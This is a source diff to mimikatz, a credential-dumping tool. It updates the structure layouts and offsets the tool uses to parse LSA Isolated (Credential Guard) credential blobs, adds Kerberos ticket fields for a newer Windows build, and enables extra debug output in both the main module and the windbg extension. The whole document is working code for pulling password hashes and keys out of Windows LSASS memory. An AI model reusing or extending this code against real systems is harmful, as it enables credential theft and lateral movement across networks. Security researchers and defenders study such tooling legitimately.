diff --git a/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c b/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c index 1ac5cb9..720f996 100644 --- a/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c +++ b/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c @@ -992,7 +992,7 @@ VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCred kuhl_m_dpapi_oe_credential_add(sid, NULL, pPrimaryCreds10->isNtOwfPassword ? pPrimaryCreds10->NtOwfPassword : NULL, pPrimaryCreds10->isShaOwPassword ? pPrimaryCreds10->ShaOwPassword : NULL, NULL, NULL); } else - kuhl_m_sekurlsa_genericLsaIsoOutput((PLSAISO_DATA_BLOB) ((PBYTE) pPrimaryCreds10 + FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, align0) + sizeof(USHORT))); + kuhl_m_sekurlsa_genericLsaIsoOutput((PLSAISO_DATA_BLOB) ((PBYTE) pPrimaryCreds10 + FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, NtOwfPassword) + sizeof(USHORT))); break; case KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIALKEY: pRpceCredentialKeyCreds = (PRPCE_CREDENTIAL_KEYCREDENTIAL) credentials->Buffer; @@ -1164,7 +1164,7 @@ VOID kuhl_m_sekurlsa_genericLsaIsoOutput(PLSAISO_DATA_BLOB blob) kprintf(L"\n\t * LSA Isolated Data: %.*S", blob->typeSize, blob->data); kprintf(L"\n\t Unk-Key : "); kull_m_string_wprintf_hex(blob->unkKeyData, 3*16, 0); kprintf(L"\n\t Encrypted: "); kull_m_string_wprintf_hex(blob->data + blob->typeSize, blob->origSize, 0); - //kprintf(L"\n\t\t SS:%u, TS:%u, DS:%u", blob->structSize, blob->typeSize, blob->origSize); - //kprintf(L"\n\t\t 0:0x%x, 1:0x%x, 2:0x%x, 3:0x%x, 4:0x%x, E:", blob->unk0, blob->unk1, blob->unk2, blob->unk3, blob->unk4); - //kull_m_string_wprintf_hex(blob->unkEmpty, 20, 0); + kprintf(L"\n\t\t SS:%u, TS:%u, DS:%u", blob->structSize, blob->typeSize, blob->origSize); + kprintf(L"\n\t\t 0:0x%x, 1:0x%x, 2:0x%x, 3:0x%x, 4:0x%x, E:", blob->unk0, blob->unk1, blob->unk2, blob->unk3, blob->unk4); + kull_m_string_wprintf_hex(blob->unkData2, sizeof(blob->unkData2), 0); kprintf(L", 5:0x%x", blob->unk5); } \ No newline at end of file diff --git a/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.h b/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.h index 2429003..f575bf5 100644 --- a/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.h +++ b/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.h @@ -183,7 +183,8 @@ typedef struct _LSAISO_DATA_BLOB { DWORD unk3; DWORD unk4; BYTE unkKeyData[3*16]; - BYTE unkEmpty[20]; + BYTE unkData2[16]; + DWORD unk5; DWORD origSize; BYTE data[ANYSIZE_ARRAY]; } LSAISO_DATA_BLOB, *PLSAISO_DATA_BLOB; \ No newline at end of file diff --git a/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_kerberos.h b/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_kerberos.h index 591255a..45afeb0 100644 --- a/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_kerberos.h +++ b/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_kerberos.h @@ -401,6 +401,8 @@ typedef struct _KIWI_KERBEROS_INTERNAL_TICKET_6 { LSA_UNICODE_STRING Description; LSA_UNICODE_STRING AltTargetDomainName; LSA_UNICODE_STRING KDCServer; //? + DWORD unk10586_d; + PVOID unk10586_p; PKERB_EXTERNAL_NAME ClientName; PVOID name0; ULONG TicketFlags; diff --git a/mimilib/sekurlsadbg/kuhl_m_sekurlsa_packages.h b/mimilib/sekurlsadbg/kuhl_m_sekurlsa_packages.h index d177634..c7679eb 100644 --- a/mimilib/sekurlsadbg/kuhl_m_sekurlsa_packages.h +++ b/mimilib/sekurlsadbg/kuhl_m_sekurlsa_packages.h @@ -470,7 +470,8 @@ typedef struct _LSAISO_DATA_BLOB { DWORD unk3; DWORD unk4; BYTE unkKeyData[3*16]; - BYTE unkEmpty[20]; + BYTE unkData2[16]; + DWORD unk5; DWORD origSize; BYTE data[ANYSIZE_ARRAY]; } LSAISO_DATA_BLOB, *PLSAISO_DATA_BLOB; diff --git a/mimilib/sekurlsadbg/kwindbg.c b/mimilib/sekurlsadbg/kwindbg.c index 5e0e462..e289eba 100644 --- a/mimilib/sekurlsadbg/kwindbg.c +++ b/mimilib/sekurlsadbg/kwindbg.c @@ -294,7 +294,7 @@ VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCred } } else - kuhl_m_sekurlsa_genericLsaIsoOutput((PLSAISO_DATA_BLOB) ((PBYTE) pPrimaryCreds10 + FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, align0) + sizeof(USHORT))); + kuhl_m_sekurlsa_genericLsaIsoOutput((PLSAISO_DATA_BLOB) ((PBYTE) pPrimaryCreds10 + FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, NtOwfPassword) + sizeof(USHORT))); break; case KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIALKEY: pRpceCredentialKeyCreds = (PRPCE_CREDENTIAL_KEYCREDENTIAL) credentials->Buffer; @@ -453,9 +453,9 @@ VOID kuhl_m_sekurlsa_genericLsaIsoOutput(PLSAISO_DATA_BLOB blob) dprintf("\n\t * LSA Isolated Data: %.*s", blob->typeSize, blob->data); dprintf("\n\t Unk-Key : "); kull_m_string_dprintf_hex(blob->unkKeyData, 3*16, 0); dprintf("\n\t Encrypted: "); kull_m_string_dprintf_hex(blob->data + blob->typeSize, blob->origSize, 0); - //kprintf(L"\n\t\t SS:%u, TS:%u, DS:%u", blob->structSize, blob->typeSize, blob->origSize); - //kprintf(L"\n\t\t 0:0x%x, 1:0x%x, 2:0x%x, 3:0x%x, 4:0x%x, E:", blob->unk0, blob->unk1, blob->unk2, blob->unk3, blob->unk4); - //kull_m_string_wprintf_hex(blob->unkEmpty, 20, 0); + dprintf("\n\t\t SS:%u, TS:%u, DS:%u", blob->structSize, blob->typeSize, blob->origSize); + dprintf("\n\t\t 0:0x%x, 1:0x%x, 2:0x%x, 3:0x%x, 4:0x%x, E:", blob->unk0, blob->unk1, blob->unk2, blob->unk3, blob->unk4); + kull_m_string_dprintf_hex(blob->unkData2, sizeof(blob->unkData2), 0); dprintf(", 5:0x%x", blob->unk5); } void kuhl_m_sekurlsa_krbtgt_keys(PVOID addr, LPCSTR prefix)